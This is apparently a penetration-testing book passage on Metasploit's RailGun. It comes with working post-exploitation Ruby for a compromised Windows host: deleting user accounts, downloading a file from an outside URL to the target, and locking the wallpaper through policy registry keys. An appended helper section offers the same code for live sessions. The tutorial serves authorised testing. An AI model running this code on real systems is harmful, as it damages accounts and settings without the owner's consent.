Working with RailGun
RailGun sounds like a gun set on rails; however, this is not the case. It is much more powerful than that. RailGun lets you call functions exported by Windows DLLs directly from a meterpreter session, without compiling and uploading a DLL of your own.
It ships with definitions for numerous Windows DLLs and makes it easy to perform system-level tasks on the compromised machine. Let's see how we can perform various tasks with RailGun and use it for some advanced post-exploitation.
Interactive Ruby shell basics
RailGun is driven from the irb shell inside meterpreter. Let's look at how we can jump to the irb shell from meterpreter:
We can see in the preceding screenshot that simply typing irb at the meterpreter prompt drops us into an interactive Ruby shell. From here we can run arbitrary Ruby code, including calls on the client object that represents the current session; this is where RailGun calls are made.
Understanding RailGun and its scripting
RailGun gives us immense power to perform tasks that Metasploit's built-in commands can not. We can call functions exported by any DLL on the breached system and build more advanced post-exploitation mechanisms on top of them.
Now, let's see how we can call a function using basic API calls with RailGun and understand how it works:
client.railgun.DLLname.function(parameters)
This is the basic structure of an API call in RailGun. The client.railgun prefix selects RailGun for the current session (the client). DLLname is the name of the DLL to call into, for example kernel32 or user32. function(parameters) names the exported API function to invoke, together with the parameters it requires. The call returns a Ruby hash: the 'return' key holds the function's return value and the 'GetLastError' key holds the Win32 error code set by the call, so a script can check whether the call actually succeeded.
Let's see an example:
The result of this API call is as follows:
Here, a call is made to the LockWorkStation() function from user32.dll, which locks the desktop session of the compromised system. Note that LockWorkStation only succeeds when the meterpreter process is running in the interactive user's desktop session; from a service session the call returns without locking anything.
Next, let's see an API call with parameters:
client.railgun.netapi32.NetUserDel(arg1, arg2)
When the preceding command runs, it deletes a particular user account from the target machine. The first argument is the name of the server holding the account and the second is the username. Let's try deleting the sss username:
Let's check whether the user has been successfully removed:
Oops! The user seems to have gone fishing. RailGun is really an awesome tool, and it has removed the user sss successfully. Before proceeding further, let's get to know what the value nil in the parameters was. Passing nil as the first parameter (the server name) tells NetUserDel to act on the local machine. Had the account lived on a remote system, we would have passed that system's NetBIOS name instead of nil. The call returns a NET_API_STATUS code in the result hash's 'return' key: 0 (NERR_Success) means the account is gone, while a nonzero value such as 2221 (NERR_UserNotFound) or 5 (ERROR_ACCESS_DENIED) tells you why the deletion failed, which is worth checking in a script rather than relying on a manual look at the user list.
Manipulating Windows API calls
DLL files are responsible for carrying out the majority of system tasks, so it is important to know which DLL exports which function. Even a simple alert box is produced by calling the appropriate function (MessageBoxA in user32.dll) from the correct DLL. This is very similar to the library files of Metasploit, each of which contains a set of methods. To study Windows API calls, we have good resources at http://source.winehq.org/WineAPI/ and http://msdn.microsoft.com/en-us/library/windows/desktop/ff818516(v=vs.85).aspx. I recommend you study a variety of API calls before proceeding further with creating RailGun scripts.
Fabricating sophisticated RailGun scripts
Taking a step further, let's delve deeper into writing meterpreter scripts that use RailGun. Let's first create a script that registers a DLL of our choosing, under a custom name, in the RailGun context:
if client.railgun.get_dll('urlmon') == nil
  print_status("Adding Function")
  # Register urlmon.dll under the name 'urlmon' so it can be called as client.railgun.urlmon
  client.railgun.add_dll('urlmon', 'C:\\WINDOWS\\system32\\urlmon.dll')
  # Describe URLDownloadToFileA so RailGun knows how to marshal its parameters
  client.railgun.add_function('urlmon', 'URLDownloadToFileA', 'DWORD', [
    ["DWORD", "pcaller",    "in"],
    ["PCHAR", "szURL",      "in"],
    ["PCHAR", "szFileName", "in"],
    ["DWORD", "Reserved",   "in"],
    ["DWORD", "lpfnCB",     "in"],
  ])
end
Save the code under a file named urlmon.rb under the /scripts/meterpreter directory.
The preceding script adds a reference to the C:\\WINDOWS\\system32\\urlmon.dll file, which contains the functions for fetching URLs, including downloading a particular file. We register this DLL under the name urlmon. Next, we add a function definition to that DLL entry, using the DLL name as the first parameter and the name of the exported function we want to call, URLDownloadToFileA, as the second parameter, followed by its return type and the list of parameters. The very first line of the code checks whether a DLL named urlmon is already registered with RailGun. If it is, the script skips adding the DLL and the function again, so the script can be run more than once in the same session without error. The pcaller parameter is set to NULL if the calling application is not an ActiveX component; if it is, it is set to the COM object. The szURL parameter specifies the URL to download. The szFileName parameter specifies the filename to save the downloaded object under. Reserved is always set to NULL, and lpfnCB is a callback that handles the status of the download; if the status is not required, this value should be set to NULL.
Let's now create another script which will make use of this function. We will create a post-exploitation script that sets a wallpaper of our choosing on the target system and prevents the user from changing it back. We will make use of the registry to modify the wallpaper settings. Let's see how we can do this.
We create another script in the same directory and name it myscript.rb as follows:
# Download the image with the URLDownloadToFileA function registered by urlmon.rb
client.railgun.urlmon.URLDownloadToFileA(0, "http://usaherald.com/wp-content/uploads/2013/05/A2.jpg", "C:\\haxd.jpg", 0, 0)
# Wallpaper values under Policies\System are enforced as policy, so the user cannot change them back
key = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"
syskey = registry_createkey(key)
print_line("System Key Created")
# Point the policy at the file we just downloaded
wall = registry_setvaldata(key, 'Wallpaper', 'C:\\haxd.jpg', 'REG_SZ')
print_line("Creating Values For Wallpaper")
# WallpaperStyle 2 stretches the image to fill the screen
wallsty = registry_setvaldata(key, 'WallpaperStyle', '2', 'REG_SZ')
print_line("Creating Wallpaper Style Profile")
As stated previously, the first line of the script calls the custom-added function URLDownloadToFileA from the urlmon DLL entry with the required parameters, so urlmon.rb must have been run in this session first. Next, we create a registry key named System under the Policies key. Then, we create two registry values of the type REG_SZ named Wallpaper and WallpaperStyle. We assign the path of the downloaded image to the Wallpaper value and set WallpaperStyle to 2, which stretches the wallpaper to fit the entire screen. Because these values live under the Policies branch rather than under Control Panel\Desktop, Windows treats them as policy and the user cannot override them from the display settings.
Let's run this script from meterpreter to see how things actually work:
As soon as we run the myscript.rb script, the registry settings are modified on the target system:
Moreover, at the next logon, the user's wallpaper is changed, and they are not able to change it back again, as shown in the following screenshot:
You can clearly see the power of RailGun, which eases the process of creating a path to whichever DLL file you want and allows you to add custom functions to it as well.
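The NetUserDel call and the urlmon/wallpaper scripts above fire their RailGun calls and then look at the result by hand. The following is an added example, not code from the book or from Metasploit, that wraps the same calls with return-value checks: it reads the NET_API_STATUS from NetUserDel, registers urlmon only once, and touches the registry only if URLDownloadToFileA returned S_OK. In a real meterpreter script, client is the session object and registry_createkey/registry_setvaldata come from Metasploit's script mixins; here a constructed FakeRailgun, FakeClient and FakeRegistry stand in for them so the script runs offline. The DLL definitions, paths and status codes are the ones used in this section and the Windows SDK; the fake objects and their canned results are assumptions made for the demo.

```ruby
# Added example, not from the book: RailGun post-exploitation helpers with
# return-value checks, plus constructed stand-ins for the meterpreter session
# (FakeRailgun/FakeClient/FakeRegistry) so the code runs without a target.

# Win32 status codes (Windows SDK values).
NERR_SUCCESS        = 0
ERROR_ACCESS_DENIED = 5
NERR_USER_NOT_FOUND = 2221   # NERR_BASE (2100) + 121
S_OK                = 0

WALLPAPER_KEY = 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'

# netapi32!NetUserDel: nil server = local machine, otherwise a NetBIOS name.
# Translates the NET_API_STATUS found under 'return' in the RailGun result.
def delete_user(client, username, server = nil)
  res = client.railgun.netapi32.NetUserDel(server, username)
  case res['return']
  when NERR_SUCCESS        then :deleted
  when NERR_USER_NOT_FOUND then :not_found
  when ERROR_ACCESS_DENIED then :access_denied
  else :"error_#{res['return']}"
  end
end

# Register urlmon.dll and URLDownloadToFileA only if not already known.
# Returns true when it registered them, false when 'urlmon' was already there.
def ensure_urlmon(client)
  return false unless client.railgun.get_dll('urlmon').nil?
  client.railgun.add_dll('urlmon', 'C:\\WINDOWS\\system32\\urlmon.dll')
  client.railgun.add_function('urlmon', 'URLDownloadToFileA', 'DWORD', [
    ['DWORD', 'pcaller',    'in'],
    ['PCHAR', 'szURL',      'in'],
    ['PCHAR', 'szFileName', 'in'],
    ['DWORD', 'Reserved',   'in'],
    ['DWORD', 'lpfnCB',     'in'],
  ])
  true
end

# Download the image and pin it as wallpaper through the policy key, but only
# if URLDownloadToFileA returned S_OK, so the policy never points at a missing file.
def set_locked_wallpaper(client, registry, url, path)
  ensure_urlmon(client)
  hr = client.railgun.urlmon.URLDownloadToFileA(0, url, path, 0, 0)['return']
  return false unless hr == S_OK
  registry.registry_createkey(WALLPAPER_KEY)
  registry.registry_setvaldata(WALLPAPER_KEY, 'Wallpaper', path, 'REG_SZ')
  registry.registry_setvaldata(WALLPAPER_KEY, 'WallpaperStyle', '2', 'REG_SZ')  # 2 = stretch
  true
end

# ---- constructed stand-ins (assumption: not real Metasploit objects) ----
# FakeDll answers any function name the way RailGun does: a hash with the
# return value under 'return' and the Win32 last-error under 'GetLastError'.
class FakeDll
  attr_reader :calls
  def initialize(&handler)
    @handler = handler
    @calls = []
  end
  def method_missing(name, *args)
    @calls << [name, args]
    { 'return' => @handler.call(name, args), 'GetLastError' => 0 }
  end
  def respond_to_missing?(*) ; true ; end
end

# FakeRailgun mimics get_dll/add_dll/add_function and two DLLs: a netapi32 that
# deletes from an in-memory user list (and denies remote servers), and a urlmon
# whose download returns a fixed HRESULT.
class FakeRailgun
  attr_reader :netapi32, :urlmon
  def initialize(users, download_hr = S_OK)
    @dlls = {}
    @netapi32 = FakeDll.new do |_fn, (server, user)|
      next ERROR_ACCESS_DENIED unless server.nil?
      users.delete(user) ? NERR_SUCCESS : NERR_USER_NOT_FOUND
    end
    @urlmon = FakeDll.new { |_fn, _args| download_hr }
  end
  def get_dll(name) ; @dlls[name] ; end
  def add_dll(name, path) ; @dlls[name] = { path: path, functions: {} } ; end
  def add_function(dll, fn, ret, params) ; @dlls[dll][:functions][fn] = [ret, params] ; end
end

FakeClient = Struct.new(:railgun)

# In-memory registry exposing the two helper names the book's script uses.
class FakeRegistry
  attr_reader :values
  def initialize ; @values = {} ; end
  def registry_createkey(key) ; @values[key] ||= {} ; true ; end
  def registry_setvaldata(key, name, data, type) ; @values.fetch(key)[name] = [data, type] ; true ; end
end
```

To use the three helpers in a real session, drop the fake classes and pass the meterpreter client (and self, for the registry helpers) into delete_user and set_locked_wallpaper; the return-code handling is the part worth keeping, since a RailGun call never raises on a Win32 failure and the 'return' and 'GetLastError' keys are the only signal you get.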
Note
More information on this DLL function is available at http://msdn.microsoft.com/en-us/library/ms775123(v=vs.85).aspx.